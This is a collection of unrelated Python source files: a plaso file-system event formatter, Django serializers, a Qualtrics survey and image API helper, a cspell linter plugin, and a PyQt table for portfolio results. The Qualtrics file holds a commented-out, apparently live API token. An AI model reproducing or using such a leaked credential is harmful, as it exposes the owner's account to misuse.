SamuelePilleri/plaso | plaso/formatters/file_system.py | f5687f12a89c7309797ccc285da78e855c120579 | # -*- coding: utf-8 -*-
"""The file system stat event formatter."""
from __future__ import unicode_literals
from dfvfs.lib import definitions as dfvfs_definitions
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class FileStatEventFormatter(interface.ConditionalEventFormatter):
"""The file system stat event formatter."""
DATA_TYPE = 'fs:stat'
FORMAT_STRING_PIECES = [
'{display_name}',
'Type: {file_entry_type}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}']
SOURCE_SHORT = 'FILE'
# The numeric values are for backwards compatibility with plaso files
# generated with older versions of dfvfs.
_FILE_ENTRY_TYPES = {
1: 'device',
2: 'directory',
3: 'file',
4: 'link',
5: 'socket',
6: 'pipe',
dfvfs_definitions.FILE_ENTRY_TYPE_DEVICE: 'device',
dfvfs_definitions.FILE_ENTRY_TYPE_DIRECTORY: 'directory',
dfvfs_definitions.FILE_ENTRY_TYPE_FILE: 'file',
dfvfs_definitions.FILE_ENTRY_TYPE_LINK: 'link',
dfvfs_definitions.FILE_ENTRY_TYPE_SOCKET: 'socket',
dfvfs_definitions.FILE_ENTRY_TYPE_PIPE: 'pipe'}
# pylint: disable=unused-argument
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_entry_type = event_values.get('file_entry_type', None)
if file_entry_type is not None:
event_values['file_entry_type'] = self._FILE_ENTRY_TYPES.get(
file_entry_type, 'UNKNOWN')
# The usage of allocated is deprecated in favor of is_allocated but
# is kept here to be backwards compatible.
if (not event_values.get('allocated', False) and
not event_values.get('is_allocated', False)):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
def GetSources(self, event):
"""Determines the the short and long source for an event object.
Args:
event (EventObject): event.
Returns:
tuple(str, str): short and long source string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
file_system_type = getattr(event, 'file_system_type', 'UNKNOWN')
timestamp_desc = getattr(event, 'timestamp_desc', 'Time')
source_long = '{0:s} {1:s}'.format(file_system_type, timestamp_desc)
return self.SOURCE_SHORT, source_long
class NTFSFileStatEventFormatter(FileStatEventFormatter):
"""The NTFS file system stat event formatter."""
DATA_TYPE = 'fs:stat:ntfs'
FORMAT_STRING_PIECES = [
'{display_name}',
'File reference: {file_reference}',
'Attribute name: {attribute_name}',
'Name: {name}',
'Parent file reference: {parent_file_reference}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{attribute_name}']
SOURCE_SHORT = 'FILE'
_ATTRIBUTE_NAMES = {
0x00000010: '$STANDARD_INFORMATION',
0x00000030: '$FILE_NAME'
}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
attribute_type = event_values.get('attribute_type', 0)
event_values['attribute_name'] = self._ATTRIBUTE_NAMES.get(
attribute_type, 'UNKNOWN')
file_reference = event_values.get('file_reference', None)
if file_reference:
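      # An NTFS file reference packs the MFT entry number into the lower 48 bits
      # and the sequence number into the upper 16 bits.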
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
if not event_values.get('is_allocated', False):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
class NTFSUSNChangeEventFormatter(interface.ConditionalEventFormatter):
"""The NTFS USN change event formatter."""
DATA_TYPE = 'fs:ntfs:usn_change'
FORMAT_STRING_PIECES = [
'{filename}',
'File reference: {file_reference}',
'Parent file reference: {parent_file_reference}',
'Update source: {update_source}',
'Update reason: {update_reason}']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{update_reason}']
SOURCE_SHORT = 'FILE'
_USN_REASON_FLAGS = {
0x00000001: 'USN_REASON_DATA_OVERWRITE',
0x00000002: 'USN_REASON_DATA_EXTEND',
0x00000004: 'USN_REASON_DATA_TRUNCATION',
0x00000010: 'USN_REASON_NAMED_DATA_OVERWRITE',
0x00000020: 'USN_REASON_NAMED_DATA_EXTEND',
0x00000040: 'USN_REASON_NAMED_DATA_TRUNCATION',
0x00000100: 'USN_REASON_FILE_CREATE',
0x00000200: 'USN_REASON_FILE_DELETE',
0x00000400: 'USN_REASON_EA_CHANGE',
0x00000800: 'USN_REASON_SECURITY_CHANGE',
0x00001000: 'USN_REASON_RENAME_OLD_NAME',
0x00002000: 'USN_REASON_RENAME_NEW_NAME',
0x00004000: 'USN_REASON_INDEXABLE_CHANGE',
0x00008000: 'USN_REASON_BASIC_INFO_CHANGE',
0x00010000: 'USN_REASON_HARD_LINK_CHANGE',
0x00020000: 'USN_REASON_COMPRESSION_CHANGE',
0x00040000: 'USN_REASON_ENCRYPTION_CHANGE',
0x00080000: 'USN_REASON_OBJECT_ID_CHANGE',
0x00100000: 'USN_REASON_REPARSE_POINT_CHANGE',
0x00200000: 'USN_REASON_STREAM_CHANGE',
0x00400000: 'USN_REASON_TRANSACTED_CHANGE',
0x80000000: 'USN_REASON_CLOSE'}
_USN_SOURCE_FLAGS = {
0x00000001: 'USN_SOURCE_DATA_MANAGEMENT',
0x00000002: 'USN_SOURCE_AUXILIARY_DATA',
0x00000004: 'USN_SOURCE_REPLICATION_MANAGEMENT'}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
update_reason_flags = event_values.get('update_reason_flags', 0)
update_reasons = []
for bitmask, description in sorted(self._USN_REASON_FLAGS.items()):
if bitmask & update_reason_flags:
update_reasons.append(description)
event_values['update_reason'] = ', '.join(update_reasons)
update_source_flags = event_values.get('update_source_flags', 0)
update_sources = []
for bitmask, description in sorted(self._USN_SOURCE_FLAGS.items()):
if bitmask & update_source_flags:
update_sources.append(description)
event_values['update_source'] = ', '.join(update_sources)
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatters([
FileStatEventFormatter, NTFSFileStatEventFormatter,
NTFSUSNChangeEventFormatter])
| [((266, 0, 268, 33), 'plaso.formatters.manager.FormattersManager.RegisterFormatters', 'manager.FormattersManager.RegisterFormatters', ({(266, 45, 268, 32): '[FileStatEventFormatter, NTFSFileStatEventFormatter,\n NTFSUSNChangeEventFormatter]'}, {}), '([FileStatEventFormatter,\n NTFSFileStatEventFormatter, NTFSUSNChangeEventFormatter])', False, 'from plaso.formatters import manager\n')] |
junlegend/back-landing-career | applications/serializers.py | cfc01b439629e48ff058fa1693af8d5a3a37949a | from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['status'] | [((6, 16, 6, 39), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ({}, {}), '()', False, 'from rest_framework import serializers\n'), ((7, 16, 7, 39), 'rest_framework.serializers.FileField', 'serializers.FileField', ({}, {}), '()', False, 'from rest_framework import serializers\n')] |
ycui1/QualtricsIAT | qualtrics_iat/qualtrics_tools.py | c81b12e2669e1e58b4653e85c0d22ac5a821b174 | from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "iNKzBVNVAoTMhwnT2amhZRAP4dTBjkEVw9AbpRWg"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the pattern using which to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
            file_type = Path(file).suffix[1:]
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
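

# A minimal usage sketch (illustrative only): the token, data center, brand
# center, library ID, and folder names below are placeholders, not real values.
if __name__ == "__main__":
    qt = QualtricsTool(api_token="<API_TOKEN>",
                       data_center="iad1",
                       brand_center="mybrand.co1")
    # Upload every PNG in a local folder to the Graphics library and print the
    # resulting image URLs.
    for image_url in qt.upload_images_api("local_images",
                                          library_id="UR_0000000000000000",
                                          qualtrics_folder="IAT stimuli",
                                          filename_pattern="*.png"):
        print(image_url)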
| [((90, 21, 90, 60), 'requests_toolbelt.multipart.encoder.MultipartEncoder', 'MultipartEncoder', (), '', False, 'from requests_toolbelt.multipart.encoder import MultipartEncoder\n'), ((91, 23, 95, 9), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((129, 28, 133, 9), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((148, 26, 148, 79), 'requests.delete', 'requests.delete', (), '', False, 'import requests\n'), ((161, 28, 165, 9), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((183, 24, 183, 85), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((114, 30, 114, 76), 'requests.delete', 'requests.delete', (), '', False, 'import requests\n'), ((177, 32, 177, 98), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((55, 20, 55, 44), 'pathlib.Path', 'Path', ({(55, 25, 55, 43): 'local_image_folder'}, {}), '(local_image_folder)', False, 'from pathlib import Path\n'), ((56, 24, 56, 34), 'pathlib.Path', 'Path', ({(56, 29, 56, 33): 'file'}, {}), '(file)', False, 'from pathlib import Path\n')] |
dndrsn/SublimeLinter-contrib-cspell | linter.py | ba2335a9282335e52282ee93f3bb2a55f9536984 | from SublimeLinter.lint import Linter, STREAM_STDOUT
class CSpell(Linter):
cmd = 'cspell stdin'
defaults = {'selector': 'source'}
regex = r'^[^:]*:(?P<line>\d+):(?P<col>\d+) - (?P<message>.*)$'
error_stream = STREAM_STDOUT
| [] |
cHemingway/test | metal/gdb/__init__.py | 7fcbd56ad6fe5368b927ea146363bf3d69cd7617 | from metal.gdb.metal_break import Breakpoint, MetalBreakpoint
from metal.gdb.exitcode import ExitBreakpoint
from metal.gdb.timeout import Timeout
from metal.gdb.newlib import NewlibBreakpoints
from metal.gdb.argv import ArgvBreakpoint
| [] |
timeerr/portfolio | portfolio/gui/tabresults/righttable.py | 256032eb638048f3cd3c824f2bb4976a8ec320b1 | #!/usr/bin/python3
from datetime import datetime
from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt, pyqtSignal, QObject
from portfolio.db.fdbhandler import results, strategies, balances
def updatingdata(func):
"""
Decorator to flag self.updatingdata_flag whenever a function
that edits data without user intervention is being run
"""
def wrapper(self, *args, **kwargs):
self.updatingdata_flag = True
func(self, *args, **kwargs)
self.updatingdata_flag = False
return wrapper
class RightTable(QTableWidget):
"""
Table dynamically showing results
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Custom Menu
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.showMenu)
        # A signal that will be emitted whenever a line is removed
self.lineremoved = LineRemoved()
# UI Tweaks
self.verticalHeader().hide()
self.setSortingEnabled(True)
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount")])
# When edited, change the data on the database too
self.cellChanged.connect(self.changeCellOnDatabase)
# A flag to prevent changeCellOnDatabase execution when needed
self.updatingdata_flag = True
# Initialization: show all transactions
self.setData(datetime(1980, 1, 1), datetime.today(), "All", "All")
@updatingdata
def setData(self, startdate, enddate, strategy, account):
"""
Asks the database for results data within certain parameters,
then shows that data on the table
"""
# Clear table
self.clear()
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount"), self.tr("Description")])
# Get desired data from db
results_to_show = results.get_results_from_query(
start_date=startdate, end_date=enddate, strategy=strategy, account=account)
# If the data is empty, we are done
if len(results_to_show) == 0:
self.setRowCount(0)
return
# Resize table
self.setRowCount(len(results_to_show))
self.setColumnCount(len(results_to_show[0]))
# Change content
for rownum, row in enumerate(results_to_show):
for colnum, data in enumerate(row):
item = QTableWidgetItem() # Item that will be inserted
if colnum == 0:
# Ids can't be editable
item.setFlags(Qt.ItemIsSelectable)
elif colnum == 1:
# Change format to display date better
data = datetime.fromtimestamp(data).strftime("%d-%m-%Y")
# Data is now formatted, we can write it on table
item.setData(0, data)
self.setItem(rownum, colnum, item)
def showMenu(self, event):
"""
Custom Menu to show when an item is right-clicked
Options:
- Remove Line: removes line from table and database
"""
menu = QMenu()
# Actions
remove_action = menu.addAction(self.tr("Remove Line"))
# Getting action selected by user
action = menu.exec_(QCursor.pos())
# Act accordingly
if action == remove_action:
self.removeSelection()
self.lineremoved.lineRemoved.emit()
@updatingdata
def removeSelection(self):
"""
Removes the entire row of every selected item,
        and then does the same on the database
"""
# Getting selected indexes, and their corresponding ids
# from the database
selected_indexes_table, selected_ids = [], []
for index in self.selectedIndexes():
index = index.row() # Row number
if index not in selected_indexes_table: # Avoid duplicates
selected_indexes_table.append(index)
selected_ids.append(int(self.item(index, 0).text()))
# Removing the rows from the table and the database
for index, id_db in zip(selected_indexes_table, selected_ids):
results.delete_result(id_db)
self.removeRow(index)
print("Removed rows with ids on db : ", selected_ids,
"\n & ids on table: ", selected_indexes_table)
def changeCellOnDatabase(self, row, column):
"""
When a Table Item is edited by the user,
we want to check if it fits the type
and edit it on the database too
"""
if self.updatingdata_flag is True:
return
# The data is being modified internally (not by the user)
# so no errors assumed
new_item = self.item(row, column)
new_item_data = new_item.text()
database_entry_id = self.item(row, 0).text()
previous_amount = results.getResultAmountById(
database_entry_id) # Useful for balance adjustments later
columnselected_name = self.horizontalHeaderItem(column).text()
        # Depending on which column the item belongs to, we validate the
        # proposed data differently
        # Check which part of the transaction has been edited, and act accordingly
# -------------- id --------------------
if columnselected_name == self.tr("Id"):
# Ids can't be edited
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(self.tr("Ids can't be edited"))
error_mssg.exec_()
# -------------- Date --------------------
elif columnselected_name == self.tr("Date"):
# The new text has to be a date
try:
new_date = datetime.strptime(new_item_data, "%d-%m-%Y")
results.update_result(
database_entry_id, new_date=new_date.timestamp())
except ValueError:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be a date in format dd-mm-yyyy"))
error_mssg.exec_()
# Reset date to previous one
previous_date_timestamp = results.get_result_date_by_id(
database_entry_id)
previous_date_text = datetime.fromtimestamp(
previous_date_timestamp).strftime("%d-%m-%Y")
self.updatingdata_flag = True
new_item.setData(0, previous_date_text)
self.updatingdata_flag = False
# -------------- Account --------------------
elif columnselected_name == self.tr("Account"):
# The account has to be an existing one
all_accounts = [a[0] for a in balances.get_all_accounts()]
previous_account = results.get_result_account_by_id(
database_entry_id)
if new_item_data not in all_accounts:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The account has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_account)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table on the db
results.update_result(
database_entry_id, new_account=new_item_data)
# Update the balance of the two accounts involved,
# according to the result amount
balances.update_balances_with_new_result(
previous_account, - previous_amount)
balances.update_balances_with_new_result(
new_item_data, previous_amount)
# -------------- Strategy --------------------
elif columnselected_name == self.tr("Strategy"):
# The strategy has to be an existing one
previous_strategy = results.get_result_strategy_by_id(
database_entry_id)
all_strategies = [s[0] for s in strategies.get_all_strategies()]
if new_item_data not in all_strategies:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The strategy has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_strategy)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table of the db
results.updateResult(
database_entry_id, newstrategy=new_item_data)
# Update the pnl of the two strategies involved,
# according to the result amount
strategies.update_strategies_with_new_result(
previous_strategy, - previous_amount)
strategies.update_strategies_with_new_result(
new_item_data, previous_amount)
# -------------- Amount --------------------
elif columnselected_name == self.tr("Amount"):
# The amount has to be an integer
try:
new_item_data = int(new_item_data)
# Change the result on the results table of the db
results.update_result(
database_entry_id, new_amount=new_item_data)
# Update the balances and strategies with the difference
# between the old and the new result
diff_betweeen_results = new_item_data - previous_amount
account_involved = results.get_result_account_by_id(
database_entry_id)
strategy_involved = results.get_result_strategy_by_id(
database_entry_id)
balances.update_balances_with_new_result(
account_involved, diff_betweeen_results)
strategies.update_strategies_with_new_result(
strategy_involved, diff_betweeen_results)
except Exception:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be an integer"))
error_mssg.exec_()
# Reset to previous amount
previous_amount = results.get_result_amount_by_id(
database_entry_id)
self.updatingdata_flag = True
new_item.setData(0, previous_amount)
self.updatingdata_flag = False
# -------------- Description --------------------
elif columnselected_name == self.tr("Description"):
# A description can be any data. So no checks
results.update_result(
database_entry_id, new_description=new_item_data)
class LineRemoved(QObject):
lineRemoved = pyqtSignal()
| [((298, 18, 298, 30), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ({}, {}), '()', False, 'from PyQt5.QtCore import Qt, pyqtSignal, QObject\n'), ((67, 26, 68, 87), 'portfolio.db.fdbhandler.results.get_results_from_query', 'results.get_results_from_query', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((102, 15, 102, 22), 'PyQt5.QtWidgets.QMenu', 'QMenu', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((155, 26, 156, 30), 'portfolio.db.fdbhandler.results.getResultAmountById', 'results.getResultAmountById', ({(156, 12, 156, 29): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((53, 21, 53, 41), 'datetime.datetime', 'datetime', ({(53, 30, 53, 34): '(1980)', (53, 36, 53, 37): '(1)', (53, 39, 53, 40): '(1)'}, {}), '(1980, 1, 1)', False, 'from datetime import datetime\n'), ((53, 43, 53, 59), 'datetime.datetime.today', 'datetime.today', ({}, {}), '()', False, 'from datetime import datetime\n'), ((108, 28, 108, 41), 'PyQt5.QtGui.QCursor.pos', 'QCursor.pos', ({}, {}), '()', False, 'from PyQt5.QtGui import QCursor\n'), ((133, 12, 133, 40), 'portfolio.db.fdbhandler.results.delete_result', 'results.delete_result', ({(133, 34, 133, 39): 'id_db'}, {}), '(id_db)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((165, 25, 165, 38), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((82, 23, 82, 41), 'PyQt5.QtWidgets.QTableWidgetItem', 'QTableWidgetItem', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((174, 27, 174, 71), 'datetime.datetime.strptime', 'datetime.strptime', ({(174, 45, 174, 58): 'new_item_data', (174, 60, 174, 70): '"""%d-%m-%Y"""'}, {}), "(new_item_data, '%d-%m-%Y')", False, 'from datetime import datetime\n'), ((198, 31, 199, 34), 'portfolio.db.fdbhandler.results.get_result_account_by_id', 'results.get_result_account_by_id', ({(199, 16, 199, 33): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((179, 29, 179, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((186, 42, 187, 38), 'portfolio.db.fdbhandler.results.get_result_date_by_id', 'results.get_result_date_by_id', ({(187, 20, 187, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((202, 29, 202, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((216, 16, 217, 65), 'portfolio.db.fdbhandler.results.update_result', 'results.update_result', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((220, 16, 221, 56), 'portfolio.db.fdbhandler.balances.update_balances_with_new_result', 'balances.update_balances_with_new_result', ({(221, 20, 221, 36): 'previous_account', (221, 38, 221, 55): '(-previous_amount)'}, {}), '(previous_account, -previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((222, 16, 223, 51), 
'portfolio.db.fdbhandler.balances.update_balances_with_new_result', 'balances.update_balances_with_new_result', ({(223, 20, 223, 33): 'new_item_data', (223, 35, 223, 50): 'previous_amount'}, {}), '(new_item_data, previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((228, 32, 229, 34), 'portfolio.db.fdbhandler.results.get_result_strategy_by_id', 'results.get_result_strategy_by_id', ({(229, 16, 229, 33): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((197, 42, 197, 69), 'portfolio.db.fdbhandler.balances.get_all_accounts', 'balances.get_all_accounts', ({}, {}), '()', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((233, 29, 233, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((246, 16, 247, 65), 'portfolio.db.fdbhandler.results.updateResult', 'results.updateResult', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((250, 16, 251, 57), 'portfolio.db.fdbhandler.strategies.update_strategies_with_new_result', 'strategies.update_strategies_with_new_result', ({(251, 20, 251, 37): 'previous_strategy', (251, 39, 251, 56): '(-previous_amount)'}, {}), '(previous_strategy, -\n previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((252, 16, 253, 51), 'portfolio.db.fdbhandler.strategies.update_strategies_with_new_result', 'strategies.update_strategies_with_new_result', ({(253, 20, 253, 33): 'new_item_data', (253, 35, 253, 50): 'previous_amount'}, {}), '(new_item_data, previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((89, 27, 89, 55), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(89, 50, 89, 54): 'data'}, {}), '(data)', False, 'from datetime import datetime\n'), ((188, 37, 189, 44), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(189, 20, 189, 43): 'previous_date_timestamp'}, {}), '(previous_date_timestamp)', False, 'from datetime import datetime\n'), ((230, 44, 230, 75), 'portfolio.db.fdbhandler.strategies.get_all_strategies', 'strategies.get_all_strategies', ({}, {}), '()', False, 'from portfolio.db.fdbhandler import results, 